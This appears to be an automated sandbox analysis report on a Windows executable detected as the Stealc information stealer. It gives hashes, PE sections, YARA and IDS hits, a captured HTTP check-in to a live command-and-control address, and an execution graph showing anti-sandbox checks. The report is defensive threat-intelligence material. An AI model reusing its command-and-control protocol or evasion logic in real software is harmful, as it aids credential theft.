185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948240905185881
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'838'080 bytes
MD5: 5afadfe8ee15c31905dbd4fd8d0cc47d
SHA1: ad98ad6e22aa75fe869344932022507386c159aa
SHA256: fb8269dae16f59cb0f20bed8792e9a497e019b6d21c489114616f2c46d1db396
SHA512: 47a17c99b2ed49d1c87d8ff00394c289e9987bba3fb3c1b0333533266b341f5109117b7b59c73c705b8b33c5d1bc36cd2be5c878fd719be29ad2668ecd22f49c
SSDEEP: 49152:ipOpJqTC24tcDM1as/k4pT9VhXe8f+1G/Bi:AlXLe7d9ru51
TLSH: EE8533E84D8391BFDB494DB92DBB389FE7F41536C88620528C72DCC5BD036A385252AD
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa95000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 20b60a66f8408c3621a6ce7e4a105f58 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x29b000 | 0x200 | d64b14f8808b2c731bf7a33091e6e6e2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
shkwfujq | 0x4f9000 | 0x19b000 | 0x19aa00 | 907d4c31a122d98f55620a1c964ef7b7 | False | 0.9949712233637747 | data | 7.954513336797254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jdqxiqxa | 0x694000 | 0x1000 | 0x400 | 5239e7967d82947a9d103719482f00dc | False | 0.8056640625 | data | 6.225972029697793 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x695000 | 0x3000 | 0x2200 | f81ee3ac8f5c19285899798f293848c4 | False | 0.05744485294117647 | DOS executable (COM) | 0.7001912987757262 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-28T08:56:09.120222+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 28, 2024 08:56:08.155246973 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:08.160214901 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 28, 2024 08:56:08.160319090 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:08.160492897 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:08.165662050 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 28, 2024 08:56:08.879842997 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 28, 2024 08:56:08.880059004 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:08.882828951 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:08.895706892 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 28, 2024 08:56:09.119900942 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 28, 2024 08:56:09.120222092 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 28, 2024 08:56:12.732840061 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
HTTP session with 185.215.113.37:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 3808 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Sep 28, 2024 08:56:08.160492897 CEST | 89 | OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Sep 28, 2024 08:56:08.879842997 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Sat, 28 Sep 2024 06:56:08 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Sep 28, 2024 08:56:08.882828951 CEST | 412 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 43 34 43 46 34 33 34 32 34 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------FIIDBKJJDGHDHJKEHJDB
Content-Disposition: form-data; name="hwid"

9C4CF43424EB3294564547
------FIIDBKJJDGHDHJKEHJDB
Content-Disposition: form-data; name="build"

save
------FIIDBKJJDGHDHJKEHJDB--
Sep 28, 2024 08:56:09.119900942 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Sat, 28 Sep 2024 06:56:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block")
Target ID: 0
Start time: 02:56:04
Start date: 28/09/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x710000
File size: 1'838'080 bytes
MD5 hash: 5AFADFE8EE15C31905DBD4FD8D0CC47D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                  Execution Graph

                                  Execution Coverage:7.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13391 7269f0 13436 712260 13391->13436 13415 726a64 13416 72a9b0 4 API calls 13415->13416 13417 726a6b 13416->13417 13418 72a9b0 4 API calls 13417->13418 13419 726a72 13418->13419 13420 72a9b0 4 API calls 13419->13420 13421 726a79 13420->13421 13422 72a9b0 4 API calls 13421->13422 13423 726a80 13422->13423 13588 72a8a0 13423->13588 13425 726b0c 13592 726920 GetSystemTime 13425->13592 13427 726a89 13427->13425 13429 726ac2 OpenEventA 13427->13429 13431 726af5 CloseHandle Sleep 13429->13431 13432 726ad9 13429->13432 13433 726b0a 13431->13433 13435 726ae1 CreateEventA 13432->13435 13433->13427 13435->13425 13789 7145c0 13436->13789 13438 712274 13439 7145c0 2 API calls 13438->13439 13440 71228d 13439->13440 13441 7145c0 2 API calls 13440->13441 13442 7122a6 13441->13442 13443 7145c0 2 API calls 13442->13443 13444 7122bf 13443->13444 13445 7145c0 2 API calls 13444->13445 13446 7122d8 13445->13446 13447 7145c0 2 API calls 13446->13447 13448 7122f1 13447->13448 13449 7145c0 2 API calls 13448->13449 13450 71230a 13449->13450 13451 7145c0 2 API calls 13450->13451 13452 712323 13451->13452 13453 7145c0 2 API calls 13452->13453 13454 71233c 13453->13454 13455 7145c0 2 API calls 13454->13455 13456 712355 13455->13456 13457 7145c0 2 API calls 13456->13457 13458 71236e 13457->13458 13459 7145c0 2 API calls 13458->13459 13460 712387 13459->13460 13461 7145c0 2 API calls 13460->13461 13462 7123a0 13461->13462 13463 7145c0 2 API calls 13462->13463 13464 7123b9 13463->13464 13465 7145c0 2 API calls 13464->13465 13466 7123d2 13465->13466 13467 7145c0 2 API calls 13466->13467 13468 7123eb 13467->13468 13469 7145c0 2 API calls 13468->13469 13470 712404 13469->13470 13471 7145c0 2 API calls 13470->13471 13472 71241d 13471->13472 13473 7145c0 2 API calls 13472->13473 13474 712436 13473->13474 13475 7145c0 2 API calls 13474->13475 13476 71244f 13475->13476 13477 7145c0 2 API calls 13476->13477 13478 712468 13477->13478 13479 7145c0 2 API 
calls 13478->13479 13480 712481 13479->13480 13481 7145c0 2 API calls 13480->13481 13482 71249a 13481->13482 13483 7145c0 2 API calls 13482->13483 13484 7124b3 13483->13484 13485 7145c0 2 API calls 13484->13485 13486 7124cc 13485->13486 13487 7145c0 2 API calls 13486->13487 13488 7124e5 13487->13488 13489 7145c0 2 API calls 13488->13489 13490 7124fe 13489->13490 13491 7145c0 2 API calls 13490->13491 13492 712517 13491->13492 13493 7145c0 2 API calls 13492->13493 13494 712530 13493->13494 13495 7145c0 2 API calls 13494->13495 13496 712549 13495->13496 13497 7145c0 2 API calls 13496->13497 13498 712562 13497->13498 13499 7145c0 2 API calls 13498->13499 13500 71257b 13499->13500 13501 7145c0 2 API calls 13500->13501 13502 712594 13501->13502 13503 7145c0 2 API calls 13502->13503 13504 7125ad 13503->13504 13505 7145c0 2 API calls 13504->13505 13506 7125c6 13505->13506 13507 7145c0 2 API calls 13506->13507 13508 7125df 13507->13508 13509 7145c0 2 API calls 13508->13509 13510 7125f8 13509->13510 13511 7145c0 2 API calls 13510->13511 13512 712611 13511->13512 13513 7145c0 2 API calls 13512->13513 13514 71262a 13513->13514 13515 7145c0 2 API calls 13514->13515 13516 712643 13515->13516 13517 7145c0 2 API calls 13516->13517 13518 71265c 13517->13518 13519 7145c0 2 API calls 13518->13519 13520 712675 13519->13520 13521 7145c0 2 API calls 13520->13521 13522 71268e 13521->13522 13523 729860 13522->13523 13794 729750 GetPEB 13523->13794 13525 729868 13526 729a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13525->13526 13527 72987a 13525->13527 13528 729af4 GetProcAddress 13526->13528 13529 729b0d 13526->13529 13530 72988c 21 API calls 13527->13530 13528->13529 13531 729b46 13529->13531 13532 729b16 GetProcAddress GetProcAddress 13529->13532 13530->13526 13533 729b68 13531->13533 13534 729b4f GetProcAddress 13531->13534 13532->13531 13535 729b71 GetProcAddress 13533->13535 13536 729b89 13533->13536 13534->13533 13535->13536 13537 729b92 GetProcAddress 
GetProcAddress 13536->13537 13538 726a00 13536->13538 13537->13538 13539 72a740 13538->13539 13540 72a750 13539->13540 13541 726a0d 13540->13541 13542 72a77e lstrcpy 13540->13542 13543 7111d0 13541->13543 13542->13541 13544 7111e8 13543->13544 13545 711217 13544->13545 13546 71120f ExitProcess 13544->13546 13547 711160 GetSystemInfo 13545->13547 13548 711184 13547->13548 13549 71117c ExitProcess 13547->13549 13550 711110 GetCurrentProcess VirtualAllocExNuma 13548->13550 13551 711141 ExitProcess 13550->13551 13552 711149 13550->13552 13795 7110a0 VirtualAlloc 13552->13795 13555 711220 13799 7289b0 13555->13799 13558 711249 __aulldiv 13559 71129a 13558->13559 13560 711292 ExitProcess 13558->13560 13561 726770 GetUserDefaultLangID 13559->13561 13562 726792 13561->13562 13563 7267d3 13561->13563 13562->13563 13564 7267a3 ExitProcess 13562->13564 13565 7267c1 ExitProcess 13562->13565 13566 7267b7 ExitProcess 13562->13566 13567 7267cb ExitProcess 13562->13567 13568 7267ad ExitProcess 13562->13568 13569 711190 13563->13569 13570 7278e0 3 API calls 13569->13570 13571 71119e 13570->13571 13572 7111cc 13571->13572 13573 727850 3 API calls 13571->13573 13576 727850 GetProcessHeap RtlAllocateHeap GetUserNameA 13572->13576 13574 7111b7 13573->13574 13574->13572 13575 7111c4 ExitProcess 13574->13575 13577 726a30 13576->13577 13578 7278e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13577->13578 13579 726a43 13578->13579 13580 72a9b0 13579->13580 13801 72a710 13580->13801 13582 72a9c1 lstrlen 13584 72a9e0 13582->13584 13583 72aa18 13802 72a7a0 13583->13802 13584->13583 13586 72a9fa lstrcpy lstrcat 13584->13586 13586->13583 13587 72aa24 13587->13415 13589 72a8bb 13588->13589 13590 72a90b 13589->13590 13591 72a8f9 lstrcpy 13589->13591 13590->13427 13591->13590 13806 726820 13592->13806 13594 72698e 13595 726998 sscanf 13594->13595 13835 72a800 13595->13835 13597 7269aa SystemTimeToFileTime SystemTimeToFileTime 13598 7269e0 13597->13598 13599 7269ce 13597->13599 13601 725b10 
13598->13601 13599->13598 13600 7269d8 ExitProcess 13599->13600 13602 725b1d 13601->13602 13603 72a740 lstrcpy 13602->13603 13604 725b2e 13603->13604 13837 72a820 lstrlen 13604->13837 13607 72a820 2 API calls 13608 725b64 13607->13608 13609 72a820 2 API calls 13608->13609 13610 725b74 13609->13610 13841 726430 13610->13841 13613 72a820 2 API calls 13614 725b93 13613->13614 13615 72a820 2 API calls 13614->13615 13616 725ba0 13615->13616 13617 72a820 2 API calls 13616->13617 13618 725bad 13617->13618 13619 72a820 2 API calls 13618->13619 13620 725bf9 13619->13620 13850 7126a0 13620->13850 13628 725cc3 13629 726430 lstrcpy 13628->13629 13630 725cd5 13629->13630 13631 72a7a0 lstrcpy 13630->13631 13632 725cf2 13631->13632 13633 72a9b0 4 API calls 13632->13633 13634 725d0a 13633->13634 13635 72a8a0 lstrcpy 13634->13635 13636 725d16 13635->13636 13637 72a9b0 4 API calls 13636->13637 13638 725d3a 13637->13638 13639 72a8a0 lstrcpy 13638->13639 13640 725d46 13639->13640 13641 72a9b0 4 API calls 13640->13641 13642 725d6a 13641->13642 13643 72a8a0 lstrcpy 13642->13643 13644 725d76 13643->13644 13645 72a740 lstrcpy 13644->13645 13646 725d9e 13645->13646 14576 727500 GetWindowsDirectoryA 13646->14576 13649 72a7a0 lstrcpy 13650 725db8 13649->13650 14586 714880 13650->14586 13652 725dbe 14731 7217a0 13652->14731 13654 725dc6 13655 72a740 lstrcpy 13654->13655 13656 725de9 13655->13656 13657 711590 lstrcpy 13656->13657 13658 725dfd 13657->13658 14747 715960 13658->14747 13660 725e03 14891 721050 13660->14891 13662 725e0e 13663 72a740 lstrcpy 13662->13663 13664 725e32 13663->13664 13665 711590 lstrcpy 13664->13665 13666 725e46 13665->13666 13667 715960 34 API calls 13666->13667 13668 725e4c 13667->13668 14895 720d90 13668->14895 13670 725e57 13671 72a740 lstrcpy 13670->13671 13672 725e79 13671->13672 13673 711590 lstrcpy 13672->13673 13674 725e8d 13673->13674 13675 715960 34 API calls 13674->13675 13676 725e93 13675->13676 14902 720f40 13676->14902 13678 725e9e 13679 711590 lstrcpy 
13678->13679 13680 725eb5 13679->13680 14907 721a10 13680->14907 13682 725eba 13683 72a740 lstrcpy 13682->13683 13684 725ed6 13683->13684 15251 714fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13684->15251 13686 725edb 13687 711590 lstrcpy 13686->13687 13688 725f5b 13687->13688 15258 720740 13688->15258 13690 725f60 13691 72a740 lstrcpy 13690->13691 13692 725f86 13691->13692 13693 711590 lstrcpy 13692->13693 13694 725f9a 13693->13694 13695 715960 34 API calls 13694->13695 13696 725fa0 13695->13696 15311 721170 13696->15311 13790 7145d1 RtlAllocateHeap 13789->13790 13792 714621 VirtualProtect 13790->13792 13792->13438 13794->13525 13797 7110c2 ctype 13795->13797 13796 7110fd 13796->13555 13797->13796 13798 7110e2 VirtualFree 13797->13798 13798->13796 13800 711233 GlobalMemoryStatusEx 13799->13800 13800->13558 13801->13582 13803 72a7c2 13802->13803 13804 72a7ec 13803->13804 13805 72a7da lstrcpy 13803->13805 13804->13587 13805->13804 13807 72a740 lstrcpy 13806->13807 13808 726833 13807->13808 13809 72a9b0 4 API calls 13808->13809 13810 726845 13809->13810 13811 72a8a0 lstrcpy 13810->13811 13812 72684e 13811->13812 13813 72a9b0 4 API calls 13812->13813 13814 726867 13813->13814 13815 72a8a0 lstrcpy 13814->13815 13816 726870 13815->13816 13817 72a9b0 4 API calls 13816->13817 13818 72688a 13817->13818 13819 72a8a0 lstrcpy 13818->13819 13820 726893 13819->13820 13821 72a9b0 4 API calls 13820->13821 13822 7268ac 13821->13822 13823 72a8a0 lstrcpy 13822->13823 13824 7268b5 13823->13824 13825 72a9b0 4 API calls 13824->13825 13826 7268cf 13825->13826 13827 72a8a0 lstrcpy 13826->13827 13828 7268d8 13827->13828 13829 72a9b0 4 API calls 13828->13829 13830 7268f3 13829->13830 13831 72a8a0 lstrcpy 13830->13831 13832 7268fc 13831->13832 13833 72a7a0 lstrcpy 13832->13833 13834 726910 13833->13834 13834->13594 13836 72a812 13835->13836 13836->13597 13838 72a83f 13837->13838 13839 725b54 13838->13839 13840 72a87b lstrcpy 13838->13840 13839->13607 13840->13839 13842 72a8a0 lstrcpy 
13841->13842 13843 726443 13842->13843 13844 72a8a0 lstrcpy 13843->13844 13845 726455 13844->13845 13846 72a8a0 lstrcpy 13845->13846 13847 726467 13846->13847 13848 72a8a0 lstrcpy 13847->13848 13849 725b86 13848->13849 13849->13613 13851 7145c0 2 API calls 13850->13851 13852 7126b4 13851->13852 13853 7145c0 2 API calls 13852->13853 13854 7126d7 13853->13854 13855 7145c0 2 API calls 13854->13855 13856 7126f0 13855->13856 13857 7145c0 2 API calls 13856->13857 13858 712709 13857->13858 13859 7145c0 2 API calls 13858->13859 13860 712736 13859->13860 13861 7145c0 2 API calls 13860->13861 13862 71274f 13861->13862 13863 7145c0 2 API calls 13862->13863 13864 712768 13863->13864 13865 7145c0 2 API calls 13864->13865 13866 712795 13865->13866 13867 7145c0 2 API calls 13866->13867 13868 7127ae 13867->13868 13869 7145c0 2 API calls 13868->13869 13870 7127c7 13869->13870 13871 7145c0 2 API calls 13870->13871 13872 7127e0 13871->13872 13873 7145c0 2 API calls 13872->13873 13874 7127f9 13873->13874 13875 7145c0 2 API calls 13874->13875 13876 712812 13875->13876 13877 7145c0 2 API calls 13876->13877 13878 71282b 13877->13878 13879 7145c0 2 API calls 13878->13879 13880 712844 13879->13880 13881 7145c0 2 API calls 13880->13881 13882 71285d 13881->13882 13883 7145c0 2 API calls 13882->13883 13884 712876 13883->13884 13885 7145c0 2 API calls 13884->13885 13886 71288f 13885->13886 13887 7145c0 2 API calls 13886->13887 13888 7128a8 13887->13888 13889 7145c0 2 API calls 13888->13889 13890 7128c1 13889->13890 13891 7145c0 2 API calls 13890->13891 13892 7128da 13891->13892 13893 7145c0 2 API calls 13892->13893 13894 7128f3 13893->13894 13895 7145c0 2 API calls 13894->13895 13896 71290c 13895->13896 13897 7145c0 2 API calls 13896->13897 13898 712925 13897->13898 13899 7145c0 2 API calls 13898->13899 13900 71293e 13899->13900 13901 7145c0 2 API calls 13900->13901 13902 712957 13901->13902 13903 7145c0 2 API calls 13902->13903 13904 712970 13903->13904 13905 7145c0 2 API calls 13904->13905 
13906 712989 13905->13906 13907 7145c0 2 API calls 13906->13907 13908 7129a2 13907->13908 13909 7145c0 2 API calls 13908->13909 13910 7129bb 13909->13910 13911 7145c0 2 API calls 13910->13911 13912 7129d4 13911->13912 13913 7145c0 2 API calls 13912->13913 13914 7129ed 13913->13914 13915 7145c0 2 API calls 13914->13915 13916 712a06 13915->13916 13917 7145c0 2 API calls 13916->13917 13918 712a1f 13917->13918 13919 7145c0 2 API calls 13918->13919 13920 712a38 13919->13920 13921 7145c0 2 API calls 13920->13921 13922 712a51 13921->13922 13923 7145c0 2 API calls 13922->13923 13924 712a6a 13923->13924 13925 7145c0 2 API calls 13924->13925 13926 712a83 13925->13926 13927 7145c0 2 API calls 13926->13927 13928 712a9c 13927->13928 13929 7145c0 2 API calls 13928->13929 13930 712ab5 13929->13930 13931 7145c0 2 API calls 13930->13931 13932 712ace 13931->13932 13933 7145c0 2 API calls 13932->13933 13934 712ae7 13933->13934 13935 7145c0 2 API calls 13934->13935 13936 712b00 13935->13936 13937 7145c0 2 API calls 13936->13937 13938 712b19 13937->13938 13939 7145c0 2 API calls 13938->13939 13940 712b32 13939->13940 13941 7145c0 2 API calls 13940->13941 13942 712b4b 13941->13942 13943 7145c0 2 API calls 13942->13943 13944 712b64 13943->13944 13945 7145c0 2 API calls 13944->13945 13946 712b7d 13945->13946 13947 7145c0 2 API calls 13946->13947 13948 712b96 13947->13948 13949 7145c0 2 API calls 13948->13949 13950 712baf 13949->13950 13951 7145c0 2 API calls 13950->13951 13952 712bc8 13951->13952 13953 7145c0 2 API calls 13952->13953 13954 712be1 13953->13954 13955 7145c0 2 API calls 13954->13955 13956 712bfa 13955->13956 13957 7145c0 2 API calls 13956->13957 13958 712c13 13957->13958 13959 7145c0 2 API calls 13958->13959 13960 712c2c 13959->13960 13961 7145c0 2 API calls 13960->13961 13962 712c45 13961->13962 13963 7145c0 2 API calls 13962->13963 13964 712c5e 13963->13964 13965 7145c0 2 API calls 13964->13965 13966 712c77 13965->13966 13967 7145c0 2 API calls 13966->13967 13968 712c90 
13967->13968 13969 7145c0 2 API calls 13968->13969 13970 712ca9 13969->13970 13971 7145c0 2 API calls 13970->13971 13972 712cc2 13971->13972 13973 7145c0 2 API calls 13972->13973 13974 712cdb 13973->13974 13975 7145c0 2 API calls 13974->13975 13976 712cf4 13975->13976 13977 7145c0 2 API calls 13976->13977 13978 712d0d 13977->13978 13979 7145c0 2 API calls 13978->13979 13980 712d26 13979->13980 13981 7145c0 2 API calls 13980->13981 13982 712d3f 13981->13982 13983 7145c0 2 API calls 13982->13983 13984 712d58 13983->13984 13985 7145c0 2 API calls 13984->13985 13986 712d71 13985->13986 13987 7145c0 2 API calls 13986->13987 13988 712d8a 13987->13988 13989 7145c0 2 API calls 13988->13989 13990 712da3 13989->13990 13991 7145c0 2 API calls 13990->13991 13992 712dbc 13991->13992 13993 7145c0 2 API calls 13992->13993 13994 712dd5 13993->13994 13995 7145c0 2 API calls 13994->13995 13996 712dee 13995->13996 13997 7145c0 2 API calls 13996->13997 13998 712e07 13997->13998 13999 7145c0 2 API calls 13998->13999 14000 712e20 13999->14000 14001 7145c0 2 API calls 14000->14001 14002 712e39 14001->14002 14003 7145c0 2 API calls 14002->14003 14004 712e52 14003->14004 14005 7145c0 2 API calls 14004->14005 14006 712e6b 14005->14006 14007 7145c0 2 API calls 14006->14007 14008 712e84 14007->14008 14009 7145c0 2 API calls 14008->14009 14010 712e9d 14009->14010 14011 7145c0 2 API calls 14010->14011 14012 712eb6 14011->14012 14013 7145c0 2 API calls 14012->14013 14014 712ecf 14013->14014 14015 7145c0 2 API calls 14014->14015 14016 712ee8 14015->14016 14017 7145c0 2 API calls 14016->14017 14018 712f01 14017->14018 14019 7145c0 2 API calls 14018->14019 14020 712f1a 14019->14020 14021 7145c0 2 API calls 14020->14021 14022 712f33 14021->14022 14023 7145c0 2 API calls 14022->14023 14024 712f4c 14023->14024 14025 7145c0 2 API calls 14024->14025 14026 712f65 14025->14026 14027 7145c0 2 API calls 14026->14027 14028 712f7e 14027->14028 14029 7145c0 2 API calls 14028->14029 14030 712f97 14029->14030 
